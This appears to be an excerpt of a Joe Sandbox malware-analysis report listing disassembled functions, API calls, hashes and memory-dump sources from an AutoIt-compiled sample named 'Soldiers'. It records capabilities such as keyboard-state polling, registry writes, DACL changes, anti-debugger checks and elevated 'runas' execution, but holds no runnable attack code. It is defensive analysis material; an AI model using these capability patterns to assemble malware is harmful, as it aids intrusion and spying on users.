                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                          • API String ID: 3953360268-2428617273
                                                          • Opcode ID: 82add9c029e02860e8f549671a00a0247e4ba475ad6fde473750eef50b225cfc
                                                          • Instruction ID: 697f50c7d58ffc5d45add2b5a40c4ccc643be305549142c7ee5fccef9ec0954e
                                                          • Opcode Fuzzy Hash: 82add9c029e02860e8f549671a00a0247e4ba475ad6fde473750eef50b225cfc
                                                          • Instruction Fuzzy Hash: BBA14DB2508344ABD710EBA9CD85DAFB7ECFF95704F404919F589C2191EB30EA08CB62
                                                          Function 0094F5D8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,000BDFBA,?,00000000), ref: 0094F5F9
                                                          • _wcscmp.LIBCMT ref: 0094F60E
                                                          • _wcscmp.LIBCMT ref: 0094F625
                                                          • GetFileAttributesW.KERNEL32(?), ref: 0094F637
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 0094F651
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0094F669
                                                          • FindClose.KERNEL32(00000000), ref: 0094F674
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0094F690
                                                          • _wcscmp.LIBCMT ref: 0094F6B7
                                                          • _wcscmp.LIBCMT ref: 0094F6CE
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0094F6E0
                                                          • SetCurrentDirectoryW.KERNEL32(0099B578), ref: 0094F6FE
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0094F708
                                                          • FindClose.KERNEL32(00000000), ref: 0094F715
                                                          • FindClose.KERNEL32(00000000), ref: 0094F727
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*
                                                          • API String ID: 1803514871-438819550
                                                          • Opcode ID: 7cfacef37f45bd0b9d087df89aecc87c1dab347d8062ff1f303ca6ccb03e3f07
                                                          • Instruction ID: 4ef4d9bf212484a8144a666b71dbbfdad5aea0d54b01d16366de5a90d1bb50b3
                                                          • Opcode Fuzzy Hash: 7cfacef37f45bd0b9d087df89aecc87c1dab347d8062ff1f303ca6ccb03e3f07
                                                          • Instruction Fuzzy Hash: F931E57364520AAEDF109BB4EC59EDE73AC9F89325F104165F818D21A0DB34DA84DA60
                                                          Function 00960EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00960FB3
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00970980,00000000,?,00000000,?,?), ref: 00961021
                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00961069
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 009610F2
                                                          • RegCloseKey.ADVAPI32(?), ref: 00961412
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0096141F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectCreateRegistryValue
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 536824911-966354055
                                                          • Opcode ID: 742902e830d66abcde6b2585965cbc345c89a28014d4c34ceb334dd4fb0550cf
                                                          • Instruction ID: db455e9d1017223cb7efe654390601141fd63b0f23149f38d61884e0753bae20
                                                          • Opcode Fuzzy Hash: 742902e830d66abcde6b2585965cbc345c89a28014d4c34ceb334dd4fb0550cf
                                                          • Instruction Fuzzy Hash: 39025C752046419FDB14EF29C891E2AB7E5FF89724F04895CF5599B362CB30EC41CB92
                                                          Function 0094F735 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,000BDFBA,?,00000000), ref: 0094F756
                                                          • _wcscmp.LIBCMT ref: 0094F76B
                                                          • _wcscmp.LIBCMT ref: 0094F782
                                                            • Part of subcall function 00944875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00944890
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0094F7B1
                                                          • FindClose.KERNEL32(00000000), ref: 0094F7BC
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0094F7D8
                                                          • _wcscmp.LIBCMT ref: 0094F7FF
                                                          • _wcscmp.LIBCMT ref: 0094F816
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0094F828
                                                          • SetCurrentDirectoryW.KERNEL32(0099B578), ref: 0094F846
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0094F850
                                                          • FindClose.KERNEL32(00000000), ref: 0094F85D
                                                          • FindClose.KERNEL32(00000000), ref: 0094F86F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*
                                                          • API String ID: 1824444939-438819550
                                                          • Opcode ID: 2e0479ef68475fbeebee18aa0e7624dbc69aed745eb6801ec77a83e20312e399
                                                          • Instruction ID: 4e9db15b03914008311e3857f4e846c6cfb4ed77ab258d61c0487dd1b4dd7562
                                                          • Opcode Fuzzy Hash: 2e0479ef68475fbeebee18aa0e7624dbc69aed745eb6801ec77a83e20312e399
                                                          • Instruction Fuzzy Hash: EC31F67350021AAADF209BB4DC98EDE77ACDF89324F104165F814E61E1EB34DE85DA60
                                                          Function 009388CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00938E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?,00000000,00000000,00000000,?,?,00938900,?,?,?), ref: 00938E3C
                                                            • Part of subcall function 00938E20: GetLastError.KERNEL32(?,00938900,?,?,?), ref: 00938E46
                                                            • Part of subcall function 00938E20: GetProcessHeap.KERNEL32(00000008,?,?,00938900,?,?,?), ref: 00938E55
                                                            • Part of subcall function 00938E20: HeapAlloc.KERNEL32(00000000,?,00938900,?,?,?), ref: 00938E5C
                                                            • Part of subcall function 00938E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?,?,00938900,?,?,?), ref: 00938E73
                                                            • Part of subcall function 00938EBD: GetProcessHeap.KERNEL32(00000008,00938916,00000000,00000000,?,00938916,?), ref: 00938EC9
                                                            • Part of subcall function 00938EBD: HeapAlloc.KERNEL32(00000000,?,00938916,?), ref: 00938ED0
                                                            • Part of subcall function 00938EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00938916,?), ref: 00938EE1
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00938931
                                                          • _memset.LIBCMT ref: 00938946
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00938965
                                                          • GetLengthSid.ADVAPI32(?), ref: 00938976
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 009389B3
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009389CF
                                                          • GetLengthSid.ADVAPI32(?), ref: 009389EC
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009389FB
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00938A02
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00938A23
                                                          • CopySid.ADVAPI32(00000000), ref: 00938A2A
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00938A5B
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00938A81
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00938A95
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: 0e2abd0e6fceae7b40d0ecc29577b2e190de9cfe3712db5908ea6b2fd2539ade
                                                          • Instruction ID: 90bc373c6ce0176fa5342f49c7dfafd75dc5a0d76d017cf3c186e0e276624980
                                                          • Opcode Fuzzy Hash: 0e2abd0e6fceae7b40d0ecc29577b2e190de9cfe3712db5908ea6b2fd2539ade
                                                          • Instruction Fuzzy Hash: 5A613575910209FFDF00DFA5DC85AAEBBB9BF84310F04812AF816E6290DB359A45DF61
                                                          Function 008F5240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008F526C
                                                          • IsDebuggerPresent.KERNEL32 ref: 008F527E
                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 008F52E6
                                                            • Part of subcall function 008F1821: _memmove.LIBCMT ref: 008F185B
                                                            • Part of subcall function 008EBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008EBC07
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 008F5366
                                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00930B2E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00930B66
                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00996D10), ref: 00930BE9
                                                          • ShellExecuteW.SHELL32(00000000), ref: 00930BF0
                                                            • Part of subcall function 008F514C: GetSysColorBrush.USER32(0000000F), ref: 008F5156
                                                            • Part of subcall function 008F514C: LoadCursorW.USER32(00000000,00007F00), ref: 008F5165
                                                            • Part of subcall function 008F514C: LoadIconW.USER32(00000063), ref: 008F517C
                                                            • Part of subcall function 008F514C: LoadIconW.USER32(000000A4), ref: 008F518E
                                                            • Part of subcall function 008F514C: LoadIconW.USER32(000000A2), ref: 008F51A0
                                                            • Part of subcall function 008F514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008F51C6
                                                            • Part of subcall function 008F514C: RegisterClassExW.USER32(?), ref: 008F521C
                                                            • Part of subcall function 008F50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001,009A8290,008F5328), ref: 008F5109
                                                            • Part of subcall function 008F50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008F512A
                                                            • Part of subcall function 008F50DB: ShowWindow.USER32(00000000), ref: 008F513E
                                                            • Part of subcall function 008F50DB: ShowWindow.USER32(00000000), ref: 008F5147
                                                            • Part of subcall function 008F59D3: _memset.LIBCMT ref: 008F59F9
                                                            • Part of subcall function 008F59D3: Shell_NotifyIconW.SHELL32(00000000,?,?,?,009A7A30), ref: 008F5A9E
                                                          Strings
                                                          • runas, xrefs: 00930BE4
                                                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00930B28
                                                          • AutoIt, xrefs: 00930B23
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                          • API String ID: 529118366-2030392706
                                                          • Opcode ID: ff15bad6423926b71192759fa24075aabbf860ee827c844f9138dda4bb4d7dbc
                                                          • Instruction ID: 81205eeaff6c7183f07ec2d1c6fe68305072da9de526e1720bec62825cfda16b
                                                          • Opcode Fuzzy Hash: ff15bad6423926b71192759fa24075aabbf860ee827c844f9138dda4bb4d7dbc
                                                          • Instruction Fuzzy Hash: 0151D631A0824CEACF11ABF8DC56EFEBB78FF86344F100065FA65E2162DA705544DB62
                                                          Function 00960A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0096147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096040D,?,?), ref: 00961491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00960B0C
                                                            • Part of subcall function 008E4D37: __itow.LIBCMT ref: 008E4D62
                                                            • Part of subcall function 008E4D37: __swprintf.LIBCMT ref: 008E4DAC
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00960BAB
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00960C43
                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00960E82
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00960E8F
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1240663315-0
                                                          • Opcode ID: bf425b63721af2ce3745a0e7c2c36b4d90f397cd761fcc981f05689e0c49272e
                                                          • Instruction ID: 360411bafb28181bffe1d0a907d559fb9a56209d48eef630ca1ff9b69da518e2
                                                          • Opcode Fuzzy Hash: bf425b63721af2ce3745a0e7c2c36b4d90f397cd761fcc981f05689e0c49272e
                                                          • Instruction Fuzzy Hash: 47E16C31204214AFCB15DF69C895E2BBBE8FF89714F04896DF589DB2A1DB31E901CB52
                                                          Function 00940508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00940530
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 009405B1
                                                          • GetKeyState.USER32(000000A0), ref: 009405CC
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 009405E6
                                                          • GetKeyState.USER32(000000A1), ref: 009405FB
                                                          • GetAsyncKeyState.USER32(00000011), ref: 00940613
                                                          • GetKeyState.USER32(00000011), ref: 00940625
                                                          • GetAsyncKeyState.USER32(00000012), ref: 0094063D
                                                          • GetKeyState.USER32(00000012), ref: 0094064F
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00940667
                                                          • GetKeyState.USER32(0000005B), ref: 00940679
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 1724f88b4cc4673df8de914b957b1d14bef6b4f90b370514769ad31b3578d2aa
                                                          • Instruction ID: 5acc85dcd9beb71e855bf8cb5bb92a70dbd23b4e9e61bd69277a7107577ac70e
                                                          • Opcode Fuzzy Hash: 1724f88b4cc4673df8de914b957b1d14bef6b4f90b370514769ad31b3578d2aa
                                                          • Instruction Fuzzy Hash: B841C9309047C96DFF3197658804BB5BEA8ABD1304F08455DEBC6875C2EBB899D8CF92
                                                          Function 0094443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __swprintf.LIBCMT ref: 00944451
                                                          • __swprintf.LIBCMT ref: 0094445E
                                                            • Part of subcall function 009038C8: __woutput_l.LIBCMT ref: 00903921
                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00944488
                                                          • LoadResource.KERNEL32(?,00000000), ref: 00944494
                                                          • LockResource.KERNEL32(00000000), ref: 009444A1
                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 009444C1
                                                          • LoadResource.KERNEL32(?,00000000), ref: 009444D3
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 009444E2
                                                          • LockResource.KERNEL32(?), ref: 009444EE
                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,?,?,00000000), ref: 0094454F
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                          • String ID:
                                                          • API String ID: 1433390588-0
                                                          • Opcode ID: 7902d92815efca437b74beec3d3abd12082449b6a845b55ee69e4ffceef18eb0
                                                          • Instruction ID: e1a6ccb1f4f434c8b4c3d30693cfbd0d75709c88a81e9e68c410c8c6c74ac720
                                                          • Opcode Fuzzy Hash: 7902d92815efca437b74beec3d3abd12082449b6a845b55ee69e4ffceef18eb0
                                                          • Instruction Fuzzy Hash: CD318D7291521AAFDF119FA0EC48FBB7BADEF45301F004425F916D2151DB74DA60DBA0
                                                          Function 00954830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: 3c6c8980c5b62670f1a2e8b93ef6cda5dbb49ab607ff11c4f722cc38e0907a20
                                                          • Instruction ID: 60c04569cb5d247953734f2af5803623f2ff3916fa90f0e2042f53b23cdc5184
                                                          • Opcode Fuzzy Hash: 3c6c8980c5b62670f1a2e8b93ef6cda5dbb49ab607ff11c4f722cc38e0907a20
                                                          • Instruction Fuzzy Hash: FA21A632219210DFDB11AF65EC19B2E77A8FF84B25F008015F909DB261CB74AD809B95
                                                          Function 00943CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00900284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F2A58,?,00008000), ref: 009002A4
                                                            • Part of subcall function 00944FEC: GetFileAttributesW.KERNEL32(?,00943BFE), ref: 00944FED
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00943D96
                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00943E3E
                                                          • MoveFileW.KERNEL32(?,?), ref: 00943E51
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00943E6E
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00943E90
                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00943EAC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 4002782344-1173974218
                                                          • Opcode ID: a9a229348e16f6fc6970a43b210a40660bfd1c318e7315e699ed709b51ef0692
                                                          • Instruction ID: eb0bb8f782f821a0c2ce6d6c1f6e67f722bd99ca631da61cebc295547a9afefd
                                                          • Opcode Fuzzy Hash: a9a229348e16f6fc6970a43b210a40660bfd1c318e7315e699ed709b51ef0692
                                                          • Instruction Fuzzy Hash: 32516C3280110DABCF15EBB4CA96EFEB779AF50300F604265E546B7092EB316F09CB61
                                                          Function 0094FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0094FA83
                                                          • FindClose.KERNEL32(00000000), ref: 0094FB96
                                                            • Part of subcall function 008E52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001,?,00000002,?,?,?,?,008EBCD4,?,?), ref: 008E52E6
                                                          • Sleep.KERNEL32(0000000A), ref: 0094FAB3
                                                          • _wcscmp.LIBCMT ref: 0094FAC7
                                                          • _wcscmp.LIBCMT ref: 0094FAE2
